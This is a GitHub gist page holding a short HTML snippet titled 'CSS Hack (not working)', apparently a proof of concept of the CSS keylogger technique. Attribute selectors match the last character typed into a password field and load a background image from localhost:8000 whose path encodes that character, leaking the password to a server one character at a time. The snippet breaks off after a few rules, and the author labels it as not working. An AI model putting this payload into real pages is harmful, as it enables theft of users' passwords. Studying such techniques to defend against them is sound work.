Skip to content

Instantly share code, notes, and snippets.

View wamdam's full-sized avatar

Daniel Kraft wamdam

  • D9T GmbH
  • Ulm, Germany
View GitHub Profile
@wamdam
wamdam / gist:12fb86d546e4ac34990d5844505c1be4
Created February 21, 2018 08:56
CSS Hack (not working)
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style>
input[type="password"][value$=" "] { background-image: url("http://localhost:8000/+"); }
input[type="password"][value$="!"] { background-image: url("http://localhost:8000/%21"); }
input[type="password"][value$="\""] { background-image: url("http://localhost:8000/%22"); }
input[type="password"][value$="#"] { background-image: url("http://localhost:8000/%23"); }
input[type="password"][value$="$"] { background-image: url("http://localhost:8000/%24"); }